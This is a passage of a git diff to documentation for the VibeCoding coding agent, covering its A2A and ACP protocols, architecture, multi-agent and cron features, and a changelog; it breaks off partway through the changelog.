+      "name": "Terminal Execution",
+      "description": "Execute shell commands, run tests, build projects"
+    },
+    {
+      "id": "code-search",
+      "name": "Code Search",
+      "description": "Search codebases with ripgrep and fd"
+    }
+  ]
+}
+```
+
+## JSON-RPC Methods
+
+### `message/send`
+
+Send a message to create or continue a task.
+
+**Request:**
+```json
+{
+  "jsonrpc": "2.0",
+  "method": "message/send",
+  "params": {
+    "task_id": "task_123",  // optional, omit to create new task
+    "message": {
+      "role": "user",
+      "parts": [
+        {"type": "text", "text": "Help me refactor main.go"}
+      ]
+    }
+  },
+  "id": 1
+}
+```
+
+**Response (sync):**
+```json
+{
+  "jsonrpc": "2.0",
+  "result": {
+    "id": "task_123",
+    "state": "completed",
+    "artifacts": [
+      {
+        "name": "response",
+        "parts": [{"type": "text", "text": "I've analyzed main.go..."}]
+      }
+    ]
+  },
+  "id": 1
+}
+```
+
+**SSE Streaming (add `Accept: text/event-stream` header):**
+```
+data: {"task_id":"task_123","state":"working","message":{"role":"agent","parts":[{"type":"text","text":"Let me"}]}}
+
+data: {"task_id":"task_123","state":"working","message":{"role":"agent","parts":[{"type":"text","text":" analyze the code..."}]}}
+
+data: {"task_id":"task_123","state":"completed","artifact":{"name":"response","parts":[{"type":"text","text":"Here's the refactored version..."}]}}
+```
+
+### `task/get`
+
+Get the current state of a task.
+
+**Request:**
+```json
+{
+  "jsonrpc": "2.0",
+  "method": "task/get",
+  "params": {
+    "task_id": "task_123"
+  },
+  "id": 2
+}
+```
+
+### `task/cancel`
+
+Cancel a running task.
+
+**Request:**
+```json
+{
+  "jsonrpc": "2.0",
+  "method": "task/cancel",
+  "params": {
+    "task_id": "task_123"
+  },
+  "id": 3
+}
+```
+
+## REST Endpoints
+
+For simpler integration, REST-style endpoints are also available:
+
+| Endpoint | Method | Description |
+|----------|--------|-------------|
+| `/.well-known/agent.json` | GET | Agent Card |
+| `/a2a` | POST | JSON-RPC 2.0 endpoint |
+| `/a2a/send` | POST | Submit task (sync or SSE) |
+| `/a2a/task?task_id=xxx` | GET | Get task state |
+| `/a2a/task/cancel` | POST | Cancel task |
+| `/a2a/events?task_id=xxx` | GET | SSE event stream |
+
+## Task States
+
+```
+submitted ─► working ─► completed
+                    ─► failed
+                    ─► canceled
+```
+
+## Examples
+
+### Submit Task (curl)
+
+```bash
+# Sync response
+curl -X POST http://localhost:8093/a2a \
+  -H "Content-Type: application/json" \
+  -d '{
+    "jsonrpc": "2.0",
+    "method": "message/send",
+    "params": {
+      "message": {
+        "role": "user",
+        "parts": [{"type": "text", "text": "List all Go files in the project"}]
+      }
+    },
+    "id": 1
+  }'
+
+# SSE streaming
+curl -X POST http://localhost:8093/a2a \
+  -H "Content-Type: application/json" \
+  -H "Accept: text/event-stream" \
+  -d '{
+    "jsonrpc": "2.0",
+    "method": "message/send",
+    "params": {
+      "message": {
+        "role": "user",
+        "parts": [{"type": "text", "text": "Explain the project structure"}]
+      }
+    },
+    "id": 1
+  }'
+```
+
+### REST API
+
+```bash
+# Submit task
+curl -X POST http://localhost:8093/a2a/send \
+  -H "Content-Type: application/json" \
+  -d '{"message": {"role": "user", "parts": [{"type": "text", "text": "Hello"}]}}'
+
+# Get task
+curl http://localhost:8093/a2a/task?task_id=task_123
+
+# Cancel task
+curl -X POST http://localhost:8093/a2a/task/cancel \
+  -H "Content-Type: application/json" \
+  -d '{"task_id": "task_123"}'
+```
+
+## Security
+
+- **Auth Token**: Bearer token authentication (same as hermes)
+- **Agent Card**: Publicly accessible (no auth required)
+- **Protected Endpoints**: `/a2a`, REST A2A routes, and `/a2a/events` require auth when `auth_token` is configured
+
+When auth is configured, clients must send:
+
+```bash
+Authorization: Bearer <auth_token>
+```
+
+## A2A Client
+
+Send tasks to other A2A servers.
+
+```bash
+# Send a task
+vibecoding a2a send "explain the project structure" --target http://remote:8093
+
+# Send with auth token
+vibecoding a2a send "run tests" --target http://remote:8093 --auth-token xxx
+
+# Discover what a server can do
+vibecoding a2a discover http://remote:8093
+```
+
+## A2A Scheduling
+
+Cron jobs can send tasks to A2A servers instead of running local agents.
+
+```bash
+# Schedule a daily task to a remote A2A server
+vibecoding hermes cron add "daily-review" "review recent changes" \
+  --schedule "@daily" \
+  --a2a-target http://review-agent:8093
+
+# Schedule with auth
+vibecoding hermes cron add "ci-check" "run CI tests" \
+  --schedule "@every 1h" \
+  --a2a-target http://ci-agent:8093 \
+  --a2a-token ${CI_TOKEN}
+```
+
+The cron scheduler will send the prompt to the A2A server instead of spawning a local agent.
+
+## A2A Master Mode
+
+A2A Master mode lets you manage multiple remote A2A agents from a single VibeCoding instance and dispatch tasks to them via the `a2a_dispatch` tool.
+
+### Quick Start
+
+```bash
+# 1. Generate sample config
+vibecoding --init-a2a-master-config
+
+# 2. Edit a2a-list.json with your remote agent details
+#    Location: ~/.vibecoding/a2a-list.json or .vibe/a2a-list.json
+
+# 3. Enable master mode
+vibecoding --enable-a2a-master
+```
+
+### Configuration
+
+`a2a-list.json` structure:
+
+```json
+{
+  "agents": [
+    {
+      "name": "code-reviewer",
+      "url": "http://localhost:8093"
+    },
+    {
+      "name": "ci-agent",
+      "url": "http://ci-server:8093",
+      "auth_token": "your-secret-token"
+    }
+  ]
+}
+```
+
+| Field | Type | Description |
+|-------|------|-------------|
+| `name` | string | Agent name (unique identifier, used in tool calls) |
+| `url` | string | A2A server URL |
+| `auth_token` | string | Bearer token (optional) |
+
+Config file locations (low to high priority):
+- `~/.vibecoding/a2a-list.json` (global)
+- `.vibe/a2a-list.json` (project-level, overrides global)
+
+### a2a_dispatch Tool
+
+When enabled, the LLM gets an `a2a_dispatch` tool to send tasks to registered remote agents:
+
+**Parameters:**
+| Parameter | Type | Description |
+|-----------|------|-------------|
+| `agent_name` | string | Target agent name (auto-enumerated from config) |
+| `message` | string | Task message |
+
+**Examples:**
+```
+a2a_dispatch(agent_name="code-reviewer", message="review main.go for bugs")
+a2a_dispatch(agent_name="ci-agent", message="run all unit tests")
+```
+
+### CLI Flags
+
+| Flag | Description |
+|------|-------------|
+| `--enable-a2a-master` | Enable A2A Master mode (off by default) |
+| `--init-a2a-master-config` | Generate sample `a2a-list.json` |
+| `--force` | Overwrite existing config file |
diff --git a/docs/en/acp.md b/docs/en/acp.md
index ff8387e..6d25f9b 100644
--- a/docs/en/acp.md
+++ b/docs/en/acp.md
@@ -56,6 +56,9 @@ vibecoding acp --sandbox
 
 # Specify mode
 vibecoding acp --mode agent
+
+# Enable multi-agent tools
+vibecoding acp --multi-agent
 ```
 
 ### ACP Command Flags
@@ -69,6 +72,7 @@ vibecoding acp --mode agent
 | `--sandbox` | - | false | Enable sandbox |
 | `--verbose` | - | false | Verbose output |
 | `--debug` | - | false | Debug logging |
+| `--multi-agent` | - | false | Enable sub-agent tools and multi-agent workflows |
 
 ## Protocol Details
 
@@ -90,9 +94,10 @@ ACP uses JSON-RPC 2.0 over stdio for communication. The protocol supports:
 VibeCoding advertises the following ACP capabilities during initialization:
 
 - **Load Session**: Load and continue previous sessions
-- **Prompt Capabilities**: Text prompts (image/audio coming soon)
+- **Prompt Capabilities**: Text prompts; ACP prompt image/audio inputs are not advertised
 - **Session Capabilities**: Cancel active prompts
-- **MCP Capabilities**: stdio transport supported
+- **MCP Capabilities**: stdio / http / sse transport supported
+- **Multi-Agent Workflows**: Available when the ACP server is started with `--multi-agent`
 
 ### Notifications
 
@@ -110,6 +115,8 @@ The server sends `session/update` notifications with the following event types:
 
 VibeCoding supports connecting to **MCP (Model Context Protocol)** servers during ACP sessions. This allows the agent to access external tools and data sources.
 
+ACP sessions use the same MCP connection and tool-registration runtime as normal CLI/TUI sessions. The difference is that ACP clients pass `mcpServers` during session creation/loading, while normal CLI/TUI sessions load `mcp.json` at process startup.
+
 ### Configuring MCP Servers
 
 MCP servers are configured by the IDE client and passed to VibeCoding when creating or loading sessions. The configuration format:
@@ -119,11 +126,26 @@ MCP servers are configured by the IDE client and passed to VibeCoding when creat
   "mcpServers": [
     {
       "name": "my-database",
+      "type": "stdio",
       "command": "/absolute/path/to/mcp-server",
       "args": ["--port", "8080"],
       "env": [
         {"name": "DB_URL", "value": "postgres://localhost/mydb"}
       ]
+    },
+    {
+      "name": "remote-tools",
+      "type": "http",
+      "url": "https://mcp.example.com",
+      "headers": [
+        {"name": "Authorization", "value": "Bearer ${TOKEN}"}
+      ]
+    },
+    {
+      "name": "legacy-sse",
+      "type": "sse",
+      "url": "https://legacy.example.com/sse",
+      "messageUrl": "https://legacy.example.com/messages"
     }
   ]
 }
@@ -133,9 +155,27 @@ MCP servers are configured by the IDE client and passed to VibeCoding when creat
 
 When an MCP server is connected, VibeCoding automatically discovers and registers all tools exposed by the server. The tools are registered with the naming convention `mcp_<server_name>_<tool_name>`, allowing the agent to use them alongside built-in tools.
 
+Registration happens before the agent freezes its system prompt and tool definitions for the session. MCP server changes therefore require creating/loading a new ACP session with the updated `mcpServers` payload.
+
+In addition to `tools/*`, VibeCoding now also discovers:
+
+- `resources/*`: exposed as MCP resource read tools
+- `prompts/*`: exposed as MCP prompt rendering tools
+
 ### MCP Transport Support
 
-Currently only `stdio` transport is supported for MCP servers. The server command must be an absolute path.
+Supported transports:
+
+- `stdio`: requires absolute `command` path
+- `http`: streamable HTTP endpoint via `url`
+- `sse`: legacy SSE stream via `url` plus `messageUrl` for client POSTs
+
+Additional notes:
+
+- MCP server names must be unique within one session
+- `headers` can be passed for `http` / `sse` transports
+- `sampling/createMessage` is bridged to the current ACP provider/model and returns assistant text content
+- MCP progress/logging/cancel notifications are surfaced as structured ACP `tool_call_update` events
 
 ## Permission System
 
@@ -215,4 +255,4 @@ Or add to `.idea/workspace.xml`:
 
 ### Step 3: Start using
 
-Use the ACP tool window in your JetBrains IDE to interact with VibeCoding.
\ No newline at end of file
+Use the ACP tool window in your JetBrains IDE to interact with VibeCoding.
diff --git a/docs/en/architecture.md b/docs/en/architecture.md
index 293cf05..d7ed668 100644
--- a/docs/en/architecture.md
+++ b/docs/en/architecture.md
@@ -4,20 +4,43 @@
 
 ```
 vibecoding/
+├── agent/                       # Public Agent/Provider interfaces and Builder
 ├── cmd/vibecoding/              # CLI entry point
 │   └── main.go                  # Main program
 ├── internal/
+│   ├── a2a/                     # A2A protocol server and master mode
+│   │   ├── config.go            # A2A configuration and initialization
+│   │   ├── handler.go           # JSON-RPC 2.0 handler + SSE
+│   │   ├── client.go            # A2A client
+│   │   ├── server.go            # HTTP server
+│   │   ├── executor.go          # Task → Agent loop executor
+│   │   ├── agent_card.go        # Agent Card generation
+│   │   ├── task.go              # Task lifecycle management
+│   │   └── master.go            # A2A Master mode (remote agent dispatch)
+│   ├── acp/                     # ACP / MCP integration
 │   ├── agent/                   # Core Agent loop
 │   │   ├── agent.go             # Agent main logic
+│   │   ├── factory.go           # AgentFactory for per-agent construction
+│   │   ├── manager.go           # AgentManager lifecycle management
+│   │   ├── router.go            # EventRouter
+│   │   ├── subagent.go          # subagent_* tools
 │   │   ├── events.go            # Event type definitions
 │   │   ├── provider.go          # Provider interface adapter
 │   │   └── system_prompt.go     # System prompt generation
 │   ├── config/                  # Configuration management
 │   ├── context/                 # Context management and token estimation
 │   ├── contextfiles/            # Context file loading
+│   ├── cron/                    # Scheduled task store and scheduler
+│   ├── gateway/                 # OpenAI-compatible HTTP gateway
+│   ├── hermes/                  # Messaging gateway (WeChat/Feishu/WebSocket)
+│   ├── mcp/                     # MCP server integration
+│   ├── memory/                  # Persistent memory (memory.md)
+│   ├── messaging/               # Messaging platform abstraction
 │   ├── platform/                # Cross-platform compatibility utilities
 │   ├── provider/                # LLM Provider abstraction
 │   │   ├── anthropic/           # Anthropic Messages API
+│   │   ├── factory/             # Shared provider/model construction
+│   │   ├── vendor*.go           # Vendor adapter registry and defaults
 │   │   └── openai/              # OpenAI Chat Completions API
 │   ├── sandbox/                 # Sandbox abstraction (bwrap, none)
 │   ├── session/                 # Session management (JSONL)
@@ -29,17 +52,49 @@ vibecoding/
 │   │   ├── edit.go              # File editing
 │   │   ├── grep.go              # Content search
 │   │   ├── find.go              # File finding
-│   │   └── ls.go                # Directory listing
+│   │   ├── ls.go                # Directory listing
+│   │   ├── plan.go              # Task planning
+│   │   ├── skill_ref.go         # Skill reference loading
+│   │   └── a2a_dispatch.go      # A2A remote agent dispatch
 │   ├── tui/                     # Terminal UI (BubbleTea)
-│   └── ua/                      # User-Agent string generation
-└── pkg/sdk/                     # Public SDK (future)
+│   ├── ua/                      # User-Agent string generation
+│   └── vendored/                # Embedded binaries (rg, fd)
+└── pkg/sdk/                     # Public SDK interface
+```
+
+## Running Modes
+
+VibeCoding supports 7 running modes, all sharing the same Agent, Provider, Tools,
+and Session infrastructure:
+
+```
+┌─────────────────────────────────────────────────────────────────────────┐
+│                        VibeCoding Running Modes                         │
+├─────────────────────────────────────────────────────────────────────────┤
+│                                                                         │
+│  ┌──────────────┐  ┌──────────────┐  ┌──────────────┐                  │
+│  │  TUI (default)│  │  Print Mode   │  │  ACP stdio   │                  │
+│  │  vibecoding   │  │  vibecoding   │  │  vibecoding   │                  │
+│  │              │  │  -p "..."     │  │  acp          │                  │
+│  └──────────────┘  └──────────────┘  └──────────────┘                  │
+│                                                                         │
+│  ┌──────────────┐  ┌──────────────┐  ┌──────────────┐  ┌────────────┐ │
+│  │ Gateway Mode  │  │  Hermes Mode  │  │ A2A Standalone│  │ A2A Master │ │
+│  │  vibecoding   │  │  vibecoding   │  │ vibecoding    │  │ --enable-  │ │
+│  │  gateway      │  │  hermes       │  │ a2a start     │  │ a2a-master │ │
+│  └──────────────┘  └──────────────┘  └──────────────┘  └────────────┘ │
+│                                                                         │
+└─────────────────────────────────────────────────────────────────────────┘
 ```
 
 ## Core Components
 
 ### 1. Provider System
 
-Provider is an abstraction layer for interacting with LLM APIs.
+Provider is an abstraction layer for interacting with LLM APIs. All running modes
+use `internal/provider/factory` for provider creation, which applies vendor adapter
+defaults before constructing the generic OpenAI-compatible or Anthropic-compatible
+protocol provider.
 
 ```
 ┌─────────────────────────────────────────────────────────────┐
@@ -51,15 +106,21 @@ Provider is an abstraction layer for interacting with LLM APIs.
 │  Name() string                                              │
 └─────────────────────────────────────────────────────────────┘
                               │
-            ┌─────────────────┼─────────────────┐
-            │                 │                 │
-            ▼                 ▼                 ▼
-    ┌───────────────┐ ┌───────────────┐ ┌───────────────┐
-    │  OpenAI       │ │  Anthropic    │ │  Custom       │
-    │  Provider     │ │  Provider     │ │  Provider     │
-    └───────────────┘ └───────────────┘ └───────────────┘
+                              │
+            ┌─────────────────┴─────────────────┐
+            ▼                                   ▼
+    ┌───────────────────┐             ┌───────────────────┐
+    │ Vendor Adapters   │             │ Generic Fallback  │
+    │ vendor_*.go       │             │ openai/anthropic  │
+    └───────────────────┘             └───────────────────┘
 ```
 
+Vendor resolution order:
+
+1. Explicit `vendor` field in provider config
+2. Base URL detection
+3. Generic fallback based on `api`
+
 #### StreamEvent Types
 
 ```go
@@ -75,7 +136,9 @@ type StreamEvent struct {
 
 ### 2. Agent Loop
 
-Agent is the core logic that coordinates Provider, Tools, and Session.
+Agent is the core logic that coordinates Provider, Tools, and Session. All running
+modes reuse the same Agent loop — the difference is only the input source (terminal,
+HTTP, messaging, A2A, stdio) and output target.
 
 ```
 ┌─────────────────────────────────────────────────────────────┐
@@ -93,7 +156,7 @@ Agent is the core logic that coordinates Provider, Tools, and Session.
 #### Execution Flow
 
 ```
-User Input
+User Input (TUI / HTTP / Messaging / A2A / ACP stdio)
     │
     ▼
 ┌───────────────┐
@@ -122,9 +185,193 @@ User Input
                        └───────────────┘
 ```
 
-### 3. Tool System
+### 3. Multi-Agent Runtime
+
+Multi-agent mode is opt-in with `--multi-agent`. When enabled, the main agent
+gets the `subagent_spawn`, `subagent_status`, `subagent_send`, and
+`subagent_destroy` tools. Child agents have isolated messages, context, session,
+registry, and job manager state.
+
+```
+Main Agent
+    │
+    ├── AgentManager creates child agents
+    ├── EventRouter routes events by AgentID
+    └── subagent_* tools manage async child work
+```
+
+Child agents cannot create nested sub-agents because their registries filter out
+the `subagent_*` tools.
+
+### 4. A2A Protocol
+
+The A2A (Agent-to-Agent) protocol enables different AI agents to discover,
+communicate, and collaborate with each other.
+
+```
+┌───────────────────────────────────────────────────────────────────┐
+│                     A2A Protocol Architecture                      │
+├───────────────────────────────────────────────────────────────────┤
+│                                                                   │
+│  ┌──────────────────┐          ┌──────────────────┐              │
+│  │   A2A Server     │          │   A2A Client     │              │
+│  │  (vibecoding)    │ ◄──────► │  (any agent)     │              │
+│  │                  │  JSON-RPC │                  │              │
+│  │  /a2a            │  2.0     │  SendMessage()   │              │
+│  │  /a2a/send       │  + SSE   │  GetTask()       │              │
+│  │  /a2a/task       │          │  CancelTask()    │              │
+│  │  /a2a/events     │          │  GetAgentCard()  │              │
+│  └──────────────────┘          └──────────────────┘              │
+│                                                                   │
+│  Task lifecycle: submitted → working → completed/failed/canceled   │
+│                                                                   │
+│  Two running modes:                                               │
+│  • Standalone: vibecoding a2a start (port 8093)                   │
+│  • Integrated: hermes.json a2a.enabled: true (shared port 8090)   │
+│                                                                   │
+└───────────────────────────────────────────────────────────────────┘
+```
+
+#### A2A Master Mode
+
+A2A Master mode is enabled via `--enable-a2a-master`. It loads a remote agent
+list from `a2a-list.json` and registers an `a2a_dispatch` tool for the LLM
+to automatically dispatch tasks.
+
+```
+┌───────────────────────────────────────────────────────────────┐
+│                   A2A Master Mode                              │
+├───────────────────────────────────────────────────────────────┤
+│                                                               │
+│  a2a-list.json                                                │
+│  ┌─────────────────────────────────────────┐                  │
+│  │ agents:                                 │                  │
+│  │   - name: code-reviewer                 │                  │
+│  │     url: http://review:8093             │                  │
+│  │   - name: ci-agent                      │                  │
+│  │     url: http://ci:8093                 │                  │
+│  └─────────────────────────────────────────┘                  │
+│           │                                                   │
+│           ▼                                                   │
+│  ┌──────────────────┐                                         │
+│  │   A2AManager     │ ← loads agent list                      │
+│  └────────┬─────────┘                                         │
+│           │                                                   │
+│           ▼                                                   │
+│  ┌──────────────────┐                                         │
+│  │  a2a_dispatch    │ ← registered as LLM tool                │
+│  │  (agent_name,    │                                         │
+│  │   message)       │                                         │
+│  └────────┬─────────┘                                         │
+│           │                                                   │
+│           ▼                                                   │
+│  ┌──────────────────┐  ┌──────────────────┐                  │
+│  │  code-reviewer   │  │  ci-agent        │                  │
+│  │  http://review   │  │  http://ci       │                  │
+│  │  :8093           │  │  :8093           │                  │
+│  └──────────────────┘  └──────────────────┘                  │
+│                                                               │
+└───────────────────────────────────────────────────────────────┘
+```
+
+### 5. Gateway Mode
+
+`internal/gateway/` implements an OpenAI-compatible HTTP gateway exposing the
+standard Chat Completions API.
+
+```
+┌─────────────────────────────────────────────────────────────┐
+│                    Gateway Architecture                       │
+├─────────────────────────────────────────────────────────────┤
+│                                                             │
+│  OpenAI-compatible clients (curl, SDK, any tool)             │
+│       │                                                     │
+│       ▼                                                     │
+│  ┌──────────────────────────────────────────┐               │
+│  │  HTTP Gateway (net/http)                 │               │
+│  │  POST /v1/chat/completions               │               │
+│  └──────────────────────────────────────────┘               │
+│       │                                                     │
+│       ▼                                                     │
+│  ┌──────────────────────────────────────────┐               │
+│  │  Agent Loop (shared)                     │               │
+│  │  + Tools + Session + Sandbox + Skills     │               │
+│  └──────────────────────────────────────────┘               │
+│                                                             │
+│  Config: gateway.json (global ~/.vibecoding/ or .vibe/)      │
+│  Security: Bearer token + allowedWorkDirs + sandbox          │
+│                                                             │
+└─────────────────────────────────────────────────────────────┘
+```
+
+### 6. Hermes Messaging Gateway
+
+`internal/hermes/` implements a messaging gateway supporting WeChat, Feishu,
+and WebSocket.
+
+```
+┌─────────────────────────────────────────────────────────────┐
+│                    Hermes Architecture                        │
+├─────────────────────────────────────────────────────────────┤
+│                                                             │
+│  ┌──────────┐  ┌──────────┐  ┌──────────┐                  │
+│  │  WeChat   │  │  Feishu   │  │ WebSocket │                  │
+│  └─────┬────┘  └─────┬────┘  └─────┬────┘                  │
+│        │             │             │                         │
+│        └─────────────┼─────────────┘                         │
+│                      ▼                                       │
+│  ┌──────────────────────────────────────────┐               │
+│  │  Hermes Dispatcher                       │               │
+│  │  (per-user session, yolo mode default)   │               │
+│  └──────────────────────────────────────────┘               │
+│       │                                                     │
+│       ▼                                                     │
+│  ┌──────────────────────────────────────────┐               │
+│  │  Agent Loop (shared)                     │               │
+│  │  + Tools + Session + Sandbox + Skills     │               │
+│  └──────────────────────────────────────────┘               │
+│                                                             │
+│  Config: hermes.json                                         │
+│  Session: <sessionDir>/hermes/<platform>/<user_id>/          │
+│                                                             │
+└─────────────────────────────────────────────────────────────┘
+```
+
+### 7. Cron Scheduler
+
+The `internal/cron` package provides a file-backed cron store and scheduler that
+can execute jobs through sub-agents or remote A2A servers. The TUI exposes `/cron`
+command entry points in multi-agent mode.
+
+```
+┌─────────────────────────────────────────────────────────────┐
+│                    Cron Scheduler                             │
+├─────────────────────────────────────────────────────────────┤
+│                                                             │
+│  ┌──────────────────┐                                       │
+│  │  CronStore       │ ← cron.json persistence               │
+│  │  (FileCronStore) │                                       │
+│  └────────┬─────────┘                                       │
+│           │                                                 │
+│           ▼                                                 │
+│  ┌──────────────────┐                                       │
+│  │  Scheduler       │ ← periodic polling (default 30s)      │
+│  └────────┬─────────┘                                       │
+│           │                                                 │
+│     ┌─────┴─────┐                                           │
+│     ▼           ▼                                           │
+│  ┌───────┐  ┌───────────┐                                   │
+│  │SubAgent│  │A2A Server │                                   │
+│  │(local) │  │(remote)   │  ← --a2a-target flag              │
+│  └───────┘  └───────────┘                                   │
+│                                                             │
+└─────────────────────────────────────────────────────────────┘
+```
+
+### 8. Tool System
 
-Tools are the way Agent interacts with the external world.
+Tools are the way Agent interacts with the external world. All running modes
+share the same tool registry.
 
 ```
 ┌─────────────────────────────────────────────────────────────┐
@@ -143,11 +390,17 @@ Tools are the way Agent interacts with the external world.
 │  File Tools   │   │  Search Tools │   │  System Tools │
 │  - read       │   │  - grep       │   │  - bash       │
 │  - write      │   │  - find       │   │  - ls         │
-│  - edit       │   │               │   │               │
+│  - edit       │   │               │   │  - jobs       │
+└───────────────┘   └───────────────┘   │  - kill       │
+                                        └───────────────┘
+┌───────────────┐   ┌───────────────┐   ┌───────────────┐
+│  Planning     │   │  Skills       │   │  A2A Master   │
+│  - plan       │   │  - skill_ref  │   │  - a2a_       │
+│               │   │               │   │    dispatch   │
 └───────────────┘   └───────────────┘   └───────────────┘
 ```
 
-### 4. Session Management
+### 9. Session Management
 
 Sessions use JSONL format with tree structure and branching support.
 
@@ -190,7 +443,7 @@ Sessions use JSONL format with tree structure and branching support.
 | `compaction` | Context compression record |
 | `label` | Session label |
 
-### 5. Sandbox System
+### 10. Sandbox System
 
 Sandbox implements process isolation through bubblewrap (bwrap).
 
@@ -208,11 +461,11 @@ Sandbox implements process isolation through bubblewrap (bwrap).
         ▼                     ▼                     ▼
 ┌───────────────┐   ┌───────────────┐   ┌───────────────┐
 │  LevelNone    │   │ LevelStandard │   │  LevelStrict  │
-│  (Unrestricted)│  │ (Project R/W) │   │ (Project R/O) │
+│ (Unrestricted)│   │ (Project R/W) │   │ (Project R/O) │
 └───────────────┘   └───────────────┘   └───────────────┘
 ```
 
-### 6. TUI System
+### 11. TUI System
 
 Terminal user interface based on BubbleTea.
 
@@ -241,15 +494,28 @@ Terminal user interface based on BubbleTea.
 └─────────────────────────────────────────────────────────────┘
 ```
 
+## Configuration Files
+
+| File | Location | Purpose |
+|------|----------|---------|
+| `settings.json` | `~/.vibecoding/` or `.vibe/` | Core settings (provider, model, mode, etc.) |
+| `gateway.json` | `~/.vibecoding/` or `.vibe/` | HTTP gateway configuration |
+| `hermes.json` | `~/.vibecoding/` or `.vibe/` | Messaging gateway configuration |
+| `a2a.json` | `~/.vibecoding/` or `.vibe/` | A2A server configuration |
+| `a2a-list.json` | `~/.vibecoding/` or `.vibe/` | A2A Master remote agent list |
+| `mcp.json` | `~/.vibecoding/` or `.vibe/` | MCP server configuration |
+| `memory.md` | project root or `~/.vibecoding/` | Persistent memory |
+| `cron.json` | `~/.vibecoding/` | Cron job persistence |
+
 ## Data Flow
 
 ### Complete Request Flow
 
 ```
-1. User Input
+1. User input (from TUI / HTTP / Messaging / A2A / ACP stdio)
    │
    ▼
-2. TUI captures input
+2. Input layer captures
    │
    ▼
 3. Agent.Run(ctx, input)
@@ -273,7 +539,7 @@ Terminal user interface based on BubbleTea.
 7. SSE streaming response
    ├── TextDelta → Display text
    ├── ThinkingDelta → Display thinking
-   └── ToolCall → Execute tool
+   └── ToolCall → Execute tool (incl. a2a_dispatch)
    │
    ▼
 8. Tool execution (via Sandbox)
@@ -308,4 +574,16 @@ Support global and project configuration, with project configuration overriding
 
 ### 5. Sandbox Isolation
 
-Implement process-level isolation through bubblewrap, protecting system security.
\ No newline at end of file
+Implement process-level isolation through bubblewrap, protecting system security.
+
+### 6. Public SDK Package
+
+The `agent/` package exposes public Go types (`Agent`, `Provider`, `Builder`) so
+external applications can embed the agent without depending on internal packages.
+See [SDK Integration Guide](sdk.md) for usage details.
+
+### 7. Shared Agent Loop
+
+All running modes (TUI, Gateway, Hermes, A2A, ACP) reuse the same Agent loop.
+The only difference is the input source and output target. This ensures behavioral
+consistency and avoids logic divergence.
diff --git a/docs/en/changelog.md b/docs/en/changelog.md
index 968d8c7..96f9fd6 100644
--- a/docs/en/changelog.md
+++ b/docs/en/changelog.md
@@ -1,5 +1,761 @@
 # Changelog
 
+
+## v0.1.32
+
+### ✨ Features
+
+- **Tool System Completeness**
+  - Added full documentation for all registered tools: `jobs`, `kill`, `question`, `memory`, `cron`, and MCP dynamic tools
+  - `jobs` tool: list and inspect background jobs started with `bash async=true`, with optional cleanup
+  - `kill` tool: terminate a running background job by ID
+  - `question` tool: AI can ask users multiple-choice questions during plan mode to clarify requirements
+  - `memory` tool (Hermes): persistent memory via `memory.md` with read/add/update/delete actions across sessions
+  - `cron` tool (Hermes/multi-agent): scheduled background tasks via sub-agents with `@daily`, `@weekly`, `@every N` schedules and one-shot support
+  - MCP dynamic tools: tools/resources/prompts from MCP servers are auto-discovered and registered per session
+
+- **Plan Mode Question Tool**
+  - Added `question` tool, registered only in TUI + plan mode
+  - AI can ask users multiple-choice questions; users select a preset option or type a custom answer
+  - Helps clarify requirements before forming a plan, producing higher-quality proposals
+  - Exposed via `QuestionHandler` optional interface (type assertion); does not pollute the public `Agent` interface
+
+### 🐛 Bug Fixes
+
+- **Bash Tool Output Safety**
+  - Synchronous bash mode now enforces a 1 GB output limit using `limitedBuffer`, preventing OOM from unbounded `bytes.Buffer` growth
+
+- **Hermes `/compact` Command**
+  - Implemented the `/compact` slash command for Hermes messaging mode (previously a TODO stub)
+  - Sets a `ForceCompact` flag on the session, consumed by the next agent run to trigger context compaction
+
+- **Session Durability**
+  - `writeEntry` now calls `f.Sync()` after writing, guaranteeing data survives crash or power loss
+  - Corrupt session lines are now logged as warnings and skipped instead of blocking session load
+
+- **Hermes Approval Race Condition**
+  - `ResolveApproval` now uses `select` to avoid writing to an already-consumed channel when timeout and approval race
+
+- **Agent Sub-agent Panic Logging**
+  - `sendParentEvent` now logs the panic value before recovering, aiding diagnosis of closed-channel races
+
+- **Atomic File Write Cleanup**
+  - `writeFileAtomic` no longer uses `defer os.Remove(tmpPath)` which would attempt to delete an already-renamed file; cleanup is now explicit on each error path
+
+- **Agent Loop Detection Configurability**
+  - `MaxConsecutiveNoText` (stuck-detection threshold) is now configurable via `AgentLoopConfig` (default 95)
+  - Fixed incorrect error message that added pre- and post-warning counters together
+
+- **Job Manager Auto-cleanup**
+  - `AddJob` now garbage-collects finished jobs older than 30 minutes (checked every 5 minutes)
+
+- **Cron Scheduler Error Logging**
+  - `checkAndRun` now logs store errors instead of silently swallowing them
+
+- **TUI Bash Output Display**
+  - Compressed bash tool output summary by removing blank lines to prevent excessive vertical height in the TUI collapsed view
+
+- **Vendored Search Tools**
+  - Added fallback to system `grep` / `find` when embedded `rg` / `fd` are unavailable for the current architecture
+
+### 📦 Distribution
+
+- Added Linux LoongArch64 (`loong64`) build and packaging targets, including tarball, Debian, and npm package metadata
+
+### ✅ Tests
+
+- Added unit tests for `limitedBuffer` truncation, `JobManager` GC, `writeFileAtomic` cleanup, `sendParentEvent` panic recovery, `MaxConsecutiveNoText` configurability, session fsync durability, corrupt-line tolerance, and `QuestionTool` metadata/mode-filtering/execution/error-handling
+
+
+## v0.1.31
+
+### 🐛 Bug Fixes
+
+- **Terminal Input**
+  - Added Home/End cursor movement support in the TUI input box
+  - Fixed the first submitted input being swallowed after canceling an approval prompt with Esc
+  - Added command history navigation with Up/Down, including repeated selection through previous inputs
+
+- **A2A Security and Reliability**
+  - Changed the default A2A host from `0.0.0.0` to `127.0.0.1`
+  - Added Bearer token authentication for `/a2a`, REST A2A routes, and SSE events while keeping the Agent Card public
+  - Replaced timestamp-based A2A task IDs with collision-resistant random IDs
+  - Made A2A task store reads and writes use cloned task snapshots to avoid accidental shared mutation
+
+- **Path and Session Safety**
+  - Fixed path containment checks to use path-aware boundaries instead of string prefix checks
+  - Prevented context `extraFiles` from escaping the working directory
+  - Encoded unsafe Hermes session path components and enforced `allowed_work_dirs` during session creation
+  - Restricted session deletion to `.jsonl` files under the configured session directory
+
+- **Auth, Approval, and Resource Limits**
+  - Switched Hermes HTTP/WebSocket token checks to constant-time comparison
+  - Changed the Hermes WebSocket client to send auth via `Authorization: Bearer ...` instead of query strings
+  - Cleaned up pending ACP permission requests on timeout and propagated ACP write errors
+  - Added request/body size limits for ACP, read-tool image files, WeChat responses, and cron A2A responses
+  - Added timeouts to cron A2A HTTP calls
+
+- **Memory, Context, and Concurrency**
+  - Added locking to memory store operations
